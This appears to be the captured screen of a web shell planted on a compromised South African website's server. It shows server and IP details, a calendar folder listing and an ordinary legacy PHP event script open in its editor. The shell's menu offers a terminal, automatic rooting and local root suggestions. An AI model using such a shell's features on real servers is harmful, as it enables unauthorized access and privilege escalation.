Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
calendar /
Delete
Unzip
Name
Size
Permission
Date
Action
Holiday.jpg
1.49
KB
-rw-r--r--
2008-01-09 04:33
OS13.jpg
1.7
KB
-rw-r--r--
2008-01-09 04:33
agenda.js
12.38
KB
-rw-r--r--
2009-01-19 08:35
agenda.php
1.15
KB
-rw-r--r--
2008-01-16 06:41
iflateng.htm
16.48
KB
-rw-r--r--
2008-01-09 04:33
mini.css
2.82
KB
-rw-r--r--
2008-01-09 04:33
mini.js
2.59
KB
-rw-r--r--
2008-01-09 04:33
mockup.css
2.77
KB
-rw-r--r--
2008-01-09 04:33
mockup.js
2.33
KB
-rw-r--r--
2008-01-09 04:33
msmall.css
2.54
KB
-rw-r--r--
2008-01-09 04:33
msmall.js
2.34
KB
-rw-r--r--
2008-01-09 04:33
plugins.js
207
B
-rw-r--r--
2008-01-09 04:33
plugins_b.js
1.24
KB
-rw-r--r--
2008-01-09 04:33
plugins_s.js
794
B
-rw-r--r--
2008-01-09 04:33
Save
Rename
<?php include( '../inc/auth.inc' ); $db = mysql_connect($loghost,$logid,$logpwd); mysql_select_db($dbname,$db); $sql = "SELECT EventID, StartDate, EndDate, EventDescription FROM SAACEEvents ORDER BY StartDate"; $queryresult = mysql_query($sql); $getrow = 1; $i = 0; do { if ($getrow) { if ($row = mysql_fetch_array($queryresult)) { $eventid = $row["EventID"]; $startdate = $row["StartDate"]; $enddate = $row["EndDate"]; $eventname = $row["EventDescription"]; } else { break; } } if (date("F", strtotime($startdate)) != $currmonth) { $currmonth = date("F", strtotime($startdate)); echo "// ".$currmonth; echo chr(10), chr(13); } $day = date("d", strtotime($startdate)); $year = date("Y", strtotime($startdate)); $month = date("m", strtotime($startdate)); $event = $eventname; echo 'fAppendEvent('.$year.','.$month.','.$day.',"","",null,null,null,null,"<div align=left class=\'MsgBoard\'>'.$event.'</div>");'; echo chr(10), chr(13); if (strtotime($enddate) > strtotime($startdate)) { $startdate = date("Y/m/d" , strtotime($startdate) + 24*60*60); $getrow = 0; } else { $getrow = 1; } $i++; } while($i < 10000); ?>